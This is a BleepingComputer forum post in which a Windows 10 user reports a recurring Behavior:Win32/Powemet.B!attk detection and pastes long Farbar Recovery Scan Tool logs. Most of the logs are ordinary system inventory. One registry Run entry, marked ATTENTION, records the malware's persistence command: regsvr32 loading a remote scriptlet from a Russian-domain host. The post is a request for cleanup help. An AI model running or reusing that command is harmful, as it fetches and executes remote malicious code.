Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Infected with Behavior:Win32/Powemet.B!attk


  • This topic is locked This topic is locked
2 replies to this topic

#1 abolajivictor

abolajivictor

  • Members
  • 4 posts
  • OFFLINE
  •  
  • Local time:10:20 PM

Posted 21 October 2017 - 09:31 PM

Hi. My laptop is running Windows 10. After I inserted a USB thumb drive, Windows Defender detected Behavior:Win32/Powemet.B!attk. Windows Defender quarantines the infected files and I then delete them; however, every time I start the computer, the same virus is detected again by Windows Defender.

 

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 21-10-2017
Ran by VEEVIC (administrator) on VICTOR (22-10-2017 03:10:18)
Running from G:\
Loaded Profiles: VEEVIC (Available Profiles: VEEVIC)
Platform: Windows 10 Home 10240.16384 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Edge)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Softex Inc.) C:\Program Files\Hewlett-Packard\SimplePass\OmniServ.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Andrea Electronics Corporation) C:\Program Files\Realtek\Audio\HDA\AERTSr64.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPWMISVC.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
() C:\Program Files (x86)\UCBrowser\Application\UCService.exe
(Oracle Corporation) C:\app\Veevic\product\12.1.0\dbhome_1\BIN\omtsreco.exe
(Oracle Corporation) C:\app\Veevic\product\12.1.0\dbhome_1\BIN\TNSLSNR.EXE
() C:\app\Veevic\product\12.1.0\dbhome_1\BIN\oravssw.exe
(Oracle Corporation) C:\app\Veevic\product\12.1.0\dbhome_1\BIN\oracle.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\NisSrv.exe
() C:\Program Files\Hewlett-Packard\SimplePass\opvapp.exe
(CyberLink Corp.) C:\Program Files (x86)\CyberLink\YouCam\YouCamService.exe
(CyberLink) C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvc_P2G8.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Hewlett-Packard) C:\Program Files\Hewlett-Packard\SimplePass\ClientCore.exe
(Hewlett-Packard) C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBroker.exe
(Hewlett-Packard) C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBrokerDsktop.exe
(Piriform Ltd) C:\Program Files\Speccy\Speccy64.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPMSGSVC.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MSASCui.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MpCmdRun.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSA_Service.exe
(Intel Corporation) C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\InstallAgent.exe

==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [7510896 2014-01-14] (Realtek Semiconductor)
HKLM\...\Run: [IgfxTray] => "C:\Windows\system32\igfxtray.exe"
HKLM\...\Run: [HotKeysCmds] => "C:\Windows\system32\hkcmd.exe"
HKLM\...\Run: [Persistence] => "C:\Windows\system32\igfxpers.exe"
HKLM\...\Run: [SimplePass] => C:\Program Files\Hewlett-Packard\SimplePass\ClientCore.exe [3962936 2014-03-28] (Hewlett-Packard)
HKLM\...\Run: [OPBHOBroker] => C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBroker.exe [415288 2014-03-28] (Hewlett-Packard)
HKLM\...\Run: [OPBHOBrokerDesktop] => C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBrokerDsktop.exe [415288 2014-03-28] (Hewlett-Packard)
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2803440 2013-12-13] (Synaptics Incorporated)
HKLM-x32\...\Run: [HPMessageService] => C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPMSGSVC.exe [1045304 2013-10-08] (Hewlett-Packard Development Company, L.P.)
HKU\S-1-5-21-133669981-2456230652-2001851347-1001\...\Run: [Speccy] => C:\Program Files\Speccy\Speccy64.exe [7128280 2016-11-18] (Piriform Ltd)
HKU\S-1-5-21-133669981-2456230652-2001851347-1001\...\Run: [COM+] => regsvr32 /s /n /u /i:hxxp://server1.aserdefa.ru/deploy.xml scrobj.dll <==== ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 192.168.43.1
Tcpip\..\Interfaces\{65c1b12d-5d53-4b49-8cfb-e5be7b92b6e8}: [DhcpNameServer] 192.168.43.1

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://g.uk.msn.com/HPALL14/191
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://g.uk.msn.com/HPALL14/191
HKU\S-1-5-21-133669981-2456230652-2001851347-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://g.uk.msn.com/HPALL14/191
HKU\S-1-5-21-133669981-2456230652-2001851347-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://g.uk.msn.com/HPALL14/191
SearchScopes: HKLM -> {16E728E7-824A-4886-A6F0-22C50DCCBF7A} URL = hxxp://www.amazon.co.uk/s/ref=azs_osd_ieauk?ie=UTF-8&tag=hp-uk3-vsb-21&link%5Fcode=qs&index=aps&field-keywords={searchTerms}
SearchScopes: HKLM-x32 -> {16E728E7-824A-4886-A6F0-22C50DCCBF7A} URL = hxxp://www.amazon.co.uk/s/ref=azs_osd_ieauk?ie=UTF-8&tag=hp-uk3-vsb-21&link%5Fcode=qs&index=aps&field-keywords={searchTerms}
SearchScopes: HKU\S-1-5-21-133669981-2456230652-2001851347-1001 -> {16E728E7-824A-4886-A6F0-22C50DCCBF7A} URL = hxxp://www.amazon.co.uk/s/ref=azs_osd_ieauk?ie=UTF-8&tag=hp-uk3-vsb-21&link%5Fcode=qs&index=aps&field-keywords={searchTerms}
BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\Office15\OCHelper.dll [2012-10-01] (Microsoft Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office15\URLREDIR.DLL [2012-10-01] (Microsoft Corporation)
BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\Office15\GROOVEEX.DLL [2012-10-01] (Microsoft Corporation)
BHO: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll [2013-08-28] (Hewlett-Packard)
BHO-x32: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\Office15\OCHelper.dll [2012-10-01] (Microsoft Corporation)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office15\URLREDIR.DLL [2012-10-01] (Microsoft Corporation)
BHO-x32: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\Office15\GROOVEEX.DLL [2012-10-01] (Microsoft Corporation)
BHO-x32: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll [2013-08-28] (Hewlett-Packard)

FireFox:
========
FF DefaultProfile: 1itnxb01.default
FF ProfilePath: C:\Users\VEEVIC\AppData\Roaming\Mozilla\Firefox\Profiles\1itnxb01.default [2017-10-22]
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\windows\SysWOW64\Adobe\Director\np32dsw_1204144.dll [2013-09-05] (Adobe Systems, Inc.)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2012-10-01] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office15\NPSPWRAP.DLL [2012-10-01] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3508.0205 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2013-02-06] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-08-15] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-08-15] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.2.6 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2017-05-24] (VideoLAN)
FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll [2012-10-12] ()
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npMeetingJoinPluginOC.dll [2012-10-01] (Microsoft Corporation)

Chrome:
=======
CHR Profile: C:\Users\VEEVIC\AppData\Local\Google\Chrome\User Data\Default [2017-10-22]
CHR Extension: (Google Docs) - C:\Users\VEEVIC\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-10-09]
CHR Extension: (Google Drive) - C:\Users\VEEVIC\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2017-10-09]
CHR Extension: (YouTube) - C:\Users\VEEVIC\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-10-09]
CHR Extension: (Google Search) - C:\Users\VEEVIC\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2017-08-15]
CHR Extension: (Google Docs Offline) - C:\Users\VEEVIC\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2017-09-08]
CHR Extension: (Chrome Hotword Shared Module) - C:\Users\VEEVIC\AppData\Local\Google\Chrome\User Data\Default\Extensions\lccekmodgklaepjeofjdjpbminllajkg [2017-09-08]
CHR Extension: (Chrome Web Store Payments) - C:\Users\VEEVIC\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-09-08]
CHR Extension: (Gmail) - C:\Users\VEEVIC\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2017-10-09]
CHR crx: C:\Program Files (x86)\Google\Chrome\Application\45.0.2454.101\default_apps\search.crx [2015-09-24]

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 HPWMISVC; C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPWMISVC.exe [1039160 2013-10-08] (Hewlett-Packard Development Company, L.P.)
R2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe [15720 2013-11-08] (Intel Corporation)
R2 omniserv; C:\Program Files\Hewlett-Packard\SimplePass\OmniServ.exe [88064 2014-03-28] (Softex Inc.) [File not signed]
S4 OracleJobSchedulerORCL; c:\app\veevic\product\12.1.0\dbhome_1\Bin\extjob.exe [45056 2014-09-11] () [File not signed]
R2 OracleOraDB12Home1MTSRecoveryService; C:\app\Veevic\product\12.1.0\dbhome_1\bin\omtsreco.exe [69120 2014-08-08] (Oracle Corporation) [File not signed]
R2 OracleServiceORCL; c:\app\veevic\product\12.1.0\dbhome_1\bin\ORACLE.EXE [211055104 2014-09-11] (Oracle Corporation) [File not signed]
R2 OracleVssWriterORCL; c:\app\veevic\product\12.1.0\dbhome_1\bin\OraVSSW.exe [208896 2014-09-11] () [File not signed]
R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [290520 2014-01-08] (Realtek Semiconductor)
R2 UCBrowserSvc; C:\Program Files (x86)\UCBrowser\Application\UCService.exe [713552 2015-06-25] () <==== ATTENTION
R3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [362928 2015-07-10] (Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24864 2015-07-10] (Microsoft Corporation)
R2 OracleOraDB12Home1TNSListener; C:\app\Veevic\product\12.1.0\dbhome_1\BIN\TNSLSNR [X]
S3 OracleRemExecServiceV2; C:\Users\VEEVIC\AppData\Local\Temp\\oraremservicev2\RemoteExecService.exe [X] <==== ATTENTION

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R1 CLVirtualDrive; C:\WINDOWS\system32\DRIVERS\CLVirtualDrive.sys [91712 2013-03-05] (CyberLink)
R3 cpuz140; C:\Users\VEEVIC\AppData\Local\Temp\cpuz140\cpuz140_x64.sys [43840 2017-10-22] (CPUID) <==== ATTENTION
S3 MEIx64; C:\WINDOWS\system32\DRIVERS\TeeDriverx64.sys [100312 2013-12-09] (Intel Corporation)
S3 RSP2STOR; C:\WINDOWS\system32\DRIVERS\RtsP2Stor.sys [291544 2014-01-04] (Realtek Semiconductor Corp.)
R3 RTWlanE; C:\WINDOWS\system32\DRIVERS\rtwlane.sys [3453144 2015-07-10] (Realtek Semiconductor Corporation )
S3 SmbDrv; C:\WINDOWS\System32\drivers\Smb_driver_AMDASF.sys [29936 2013-12-13] (Synaptics Incorporated)
R3 SmbDrvI; C:\WINDOWS\system32\DRIVERS\Smb_driver_Intel.sys [31472 2013-12-13] (Synaptics Incorporated)
S3 UdeCx; C:\WINDOWS\System32\drivers\udecx.sys [44032 2015-07-10] ()
S0 WdBoot; C:\WINDOWS\System32\drivers\WdBoot.sys [44568 2015-07-10] (Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\WdFilter.sys [291680 2015-07-10] (Microsoft Corporation)
R2 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [119648 2015-07-10] (Microsoft Corporation)
R3 WirelessButtonDriver; C:\WINDOWS\System32\drivers\WirelessButtonDriver64.sys [20800 2013-07-23] (Hewlett-Packard Development Company, L.P.)
S3 wfpcapture; \SystemRoot\System32\drivers\wfpcapture.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-10-22 03:02 - 2017-10-22 03:02 - 000016148 _____ C:\WINDOWS\system32\VICTOR_VEEVIC_HistoryPrediction.bin
2017-10-22 02:46 - 2017-10-22 03:10 - 000000000 ____D C:\FRST
2017-10-16 00:34 - 2017-10-16 00:34 - 000001127 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Opera Browser.lnk
2017-10-16 00:33 - 2017-10-21 18:33 - 000003246 _____ C:\WINDOWS\System32\Tasks\HPCeeScheduleForVEEVIC
2017-10-16 00:33 - 2017-10-21 18:33 - 000000350 _____ C:\WINDOWS\Tasks\HPCeeScheduleForVEEVIC.job
2017-10-12 17:33 - 2017-10-12 17:33 - 000000000 ____D C:\Users\VEEVIC\AppData\Roaming\WildTangent
2017-10-05 22:56 - 2017-10-05 22:56 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\USB Disk Storage Format Tool 5.3
2017-09-27 23:23 - 2017-10-22 02:59 - 000000000 ____D C:\Users\VEEVIC\AppData\LocalLow\Temp
2017-09-24 14:38 - 2017-09-24 14:47 - 000000000 ____D C:\Users\VEEVIC\AppData\Roaming\SQL Developer

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-10-22 03:08 - 2017-08-15 11:17 - 000000000 ____D C:\Users\VEEVIC\Documents\Youcam
2017-10-22 03:08 - 2015-07-10 12:04 - 000000000 ___HD C:\Program Files\WindowsApps
2017-10-22 03:08 - 2015-07-10 12:04 - 000000000 ____D C:\WINDOWS\AppReadiness
2017-10-22 03:04 - 2017-08-15 12:02 - 000000472 _____ C:\WINDOWS\Tasks\UCBrowserUpdater{e23df38b34103b001ee4a910a2610d11}.job
2017-10-22 03:02 - 2015-07-10 13:21 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2017-10-22 03:01 - 2015-07-10 10:05 - 000262144 ___SH C:\WINDOWS\system32\config\BBI
2017-10-22 02:54 - 2017-08-15 12:01 - 000004150 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{F2867AE8-EE6D-456B-869E-65CC1A5A13FD}
2017-10-21 21:20 - 2017-08-15 12:03 - 000000000 ____D C:\Users\VEEVIC\AppData\Roaming\vlc
2017-10-21 16:16 - 2017-08-15 12:07 - 000000000 ____D C:\Users\VEEVIC\Desktop\NEW FOLDER
2017-10-21 15:42 - 2017-09-04 00:03 - 000976198 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2017-10-21 15:42 - 2015-07-10 12:02 - 000000000 ____D C:\WINDOWS\INF
2017-10-18 21:15 - 2017-09-04 00:32 - 000000000 ___RD C:\Users\VEEVIC\OneDrive
2017-10-16 00:34 - 2017-08-15 11:58 - 000003952 _____ C:\WINDOWS\System32\Tasks\Opera scheduled Autoupdate 1502794694
2017-10-16 00:34 - 2017-08-15 11:58 - 000000000 ____D C:\Program Files (x86)\Opera
2017-10-15 06:27 - 2017-08-15 12:02 - 000003560 _____ C:\WINDOWS\System32\Tasks\UCBrowserUpdater{e23df38b34103b001ee4a910a2610d11}
2017-10-05 22:31 - 2015-07-10 12:04 - 000000000 ____D C:\WINDOWS\LiveKernelReports
2017-10-05 00:06 - 2017-08-27 14:29 - 000000000 ____D C:\Users\VEEVIC\AppData\Local\ElevatedDiagnostics
2017-09-30 10:10 - 2015-07-10 11:55 - 000000000 ____D C:\WINDOWS\CbsTemp
2017-09-30 10:09 - 2017-09-05 17:58 - 000000000 ____D C:\Program Files\rempl
2017-09-30 09:23 - 2015-07-10 14:12 - 000000000 ____D C:\WINDOWS\OCR
2017-09-24 15:40 - 2017-08-15 12:01 - 000000000 __SHD C:\Users\VEEVIC\AppData\Local\EmieUserList
2017-09-24 15:40 - 2017-08-15 12:01 - 000000000 __SHD C:\Users\VEEVIC\AppData\Local\EmieSiteList

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2017-10-16 00:20

==================== End of FRST.txt ============================

 

 

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 21-10-2017
Ran by VEEVIC (22-10-2017 03:12:17)
Running from G:\
Windows 10 Home 10240.16384 (X64) (2017-09-03 23:27:05)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-133669981-2456230652-2001851347-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-133669981-2456230652-2001851347-503 - Limited - Disabled)
Guest (S-1-5-21-133669981-2456230652-2001851347-501 - Limited - Disabled)
VEEVIC (S-1-5-21-133669981-2456230652-2001851347-1001 - Administrator - Enabled) => C:\Users\VEEVIC
Veevic 2 (S-1-5-21-133669981-2456230652-2001851347-1002 - Limited - Enabled)

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

4 Elements II (HKLM-x32\...\WTA-6a199fa1-38f1-44b3-a101-934f39e3f93c) (Version: 2.2.0.98 - WildTangent) Hidden
7-Zip 9.20 (x64 edition) (HKLM\...\{23170F69-40C1-2702-0920-000001000000}) (Version: 9.20.00.0 - Igor Pavlov)
Adobe Shockwave Player 12.0 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.0.4.144 - Adobe Systems, Inc.)
Airport Mania (HKLM-x32\...\WTA-f11a0709-a1c3-40ee-8032-f61d3268c3dc) (Version: 2.2.0.95 - WildTangent) Hidden
Azkend 2: The World Beneath (HKLM-x32\...\WTA-efd1fcbc-5ab8-460f-84d6-236841cef9a9) (Version: 2.2.0.98 - WildTangent) Hidden
Bejeweled 3 (HKLM-x32\...\WTA-2f234d5b-d479-48fa-98de-277ce43b117e) (Version: 2.2.0.98 - WildTangent) Hidden
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
Bounce Symphony (HKLM-x32\...\WTA-a640bb4c-a935-44f0-bcf5-f632e3880877) (Version: 2.2.0.97 - WildTangent) Hidden
Build-a-lot (HKLM-x32\...\WTA-d1f09a10-b598-4241-85af-a55e773df399) (Version: 2.2.0.98 - WildTangent) Hidden
Cheat Engine 6.7 (HKLM-x32\...\Cheat Engine 6.7_is1) (Version:  - Cheat Engine)
Cisco EAP-FAST Module (HKLM-x32\...\{64BF0187-F3D2-498B-99EA-163AF9AE6EC9}) (Version: 2.2.14 - Cisco Systems, Inc.)
Cisco LEAP Module (HKLM-x32\...\{AF312B06-5C5C-468E-89B3-BE6DE2645722}) (Version: 1.0.19 - Cisco Systems, Inc.)
Cisco PEAP Module (HKLM-x32\...\{0A4EF0E6-A912-4CDE-A7F3-6E56E7C13A2F}) (Version: 1.1.6 - Cisco Systems, Inc.)
Cradle Of Egypt Collector's Edition (HKLM-x32\...\WTA-49d4c6b7-8cde-4cb6-a371-3b42db330957) (Version: 2.2.0.110 - WildTangent) Hidden
Cradle of Rome 2 (HKLM-x32\...\WTA-9d2834b3-8e45-414a-a4b4-3f22755e8953) (Version: 2.2.0.98 - WildTangent) Hidden
Curse at Twilight (HKLM-x32\...\WTA-6c2273fa-fc27-493a-a971-65d758f05d49) (Version: 3.0.2.32 - WildTangent) Hidden
CyberLink LabelPrint (HKLM-x32\...\InstallShield_{C59C179C-668D-49A9-B6EA-0121CCFC1243}) (Version: 2.5.5.6902 - CyberLink Corp.)
CyberLink Media Suite 10 (HKLM-x32\...\InstallShield_{1FBF6C24-C1fD-4101-A42B-0C564F9E8E79}) (Version: 10.0.5.3303 - CyberLink Corp.)
CyberLink Power2Go 8 (HKLM-x32\...\InstallShield_{2A87D48D-3FDF-41fd-97CD-A1E370EFFFE2}) (Version: 8.0.5.3416 - CyberLink Corp.)
CyberLink PowerDVD 12 (HKLM-x32\...\InstallShield_{B46BEA36-0B71-4A4E-AE41-87241643FA0A}) (Version: 12.0.3.3709 - CyberLink Corp.)
CyberLink YouCam (HKLM-x32\...\InstallShield_{01FB4998-33C4-4431-85ED-079E3EEFE75D}) (Version: 5.0.3.3907 - CyberLink Corp.)
D3DX10 (HKLM-x32\...\{E09C4DB7-630C-4F06-A631-8EA7239923AF}) (Version: 15.4.2368.0902 - Microsoft) Hidden
Delicious: Emily's Childhood Memories Premium Edition (HKLM-x32\...\WTA-37e68c7b-be4d-4447-b2bf-c9b96990e3a3) (Version: 3.0.2.32 - WildTangent) Hidden
DisableMSDefender (HKLM\...\{74FE39A0-FB76-47CD-84BA-91E2BBB17EF2}) (Version: 1.0.0 - Hewlett-Packard Company) Hidden
Energy Star (HKLM\...\{465CA2B6-98AF-4E77-BE22-A908C34BB9EC}) (Version: 1.0.9 - Hewlett-Packard Company)
Farm Frenzy (HKLM-x32\...\WTA-c0345513-4d55-4beb-8f79-b514f21925d1) (Version: 2.2.0.98 - WildTangent) Hidden
Fishdom 3: Collector's Edition (HKLM-x32\...\WTA-1e94da68-c4ab-419c-98ae-0155eb46eaee) (Version: 3.0.2.38 - WildTangent) Hidden
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 45.0.2454.101 - Google Inc.)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.5 - Google Inc.) Hidden
Governor of Poker 2 Premium Edition (HKLM-x32\...\WTA-7b403209-d16e-4175-b662-b52d90f47008) (Version: 2.2.0.110 - WildTangent) Hidden
Hewlett-Packard ACLM.NET v1.2.2.3 (HKLM-x32\...\{6F340107-F9AA-47C6-B54C-C3A19F11553F}) (Version: 1.00.0000 - Hewlett-Packard Company) Hidden
House of 1000 Doors: Family Secrets (HKLM-x32\...\WTA-1e95c3d9-df03-4c02-8c0f-8b6fb144c86f) (Version: 2.2.0.98 - WildTangent) Hidden
HP Documentation (HKLM-x32\...\{F29E3AA8-CF19-4452-92B7-F1FE31CD11C5}) (Version: 1.1.0.0 - Hewlett-Packard)
HP Registration Service (HKLM\...\{D1E8F2D7-7794-4245-B286-87ED86C1893C}) (Version: 1.2.7372.4698 - Hewlett-Packard)
HP SimplePass (HKLM-x32\...\InstallShield_{314FAD12-F785-4471-BCE8-AB506642B9A1}) (Version: 8.01.11 - Hewlett-Packard)
HP Support Assistant (HKLM-x32\...\{8C696B4B-6AB1-44BC-9416-96EAC474CABE}) (Version: 7.5.2.12 - Hewlett-Packard Company)
HP System Event Utility (HKLM-x32\...\{C78E8F51-3EAD-4F0C-83F0-EF371075E0B4}) (Version: 1.0.10 - Hewlett-Packard Company)
HP Utility Center (HKLM\...\{891A1782-8B20-4403-8383-458962525926}) (Version: 2.3.4 - Hewlett-Packard Company)
HP Wireless Button Driver (HKLM-x32\...\{30B2D1D8-0A07-4B71-9553-0710C5D31E35}) (Version: 1.1.2.1 - Hewlett-Packard Company)
Inst5675 (HKLM\...\{2DE6247C-7077-451B-8BA7-FFD1A2ABBB47}) (Version: 8.01.11 - Softex Inc.) Hidden
Inst5676 (HKLM\...\{878F6913-7421-4713-97F7-0A736EE2A188}) (Version: 8.01.11 - Softex Inc.) Hidden
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3368 - Intel Corporation)
Intel® Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 12.8.9.1000 - Intel Corporation)
Jewel Match 3 (HKLM-x32\...\WTA-2fe7d742-fdd7-4c3a-b607-ec6293578a76) (Version: 2.2.0.98 - WildTangent) Hidden
John Deere Drive Green (HKLM-x32\...\WTA-6ae21466-8c8e-4449-9639-b3ac0827411e) (Version: 2.2.0.95 - WildTangent) Hidden
KB4023057 (HKLM\...\{ED06689A-33B7-4D35-8F76-36A82CD03406}) (Version: 2.3.0.0 - Microsoft Corporation)
King Oddball (HKLM-x32\...\WTA-c7a4f2ec-c319-4945-9d26-4232b362e01b) (Version: 3.0.2.48 - WildTangent) Hidden
Luxor Evolved (HKLM-x32\...\WTA-ad0f0cf6-b1d4-4c11-9ee4-2fef9880b6a0) (Version: 2.2.0.98 - WildTangent) Hidden
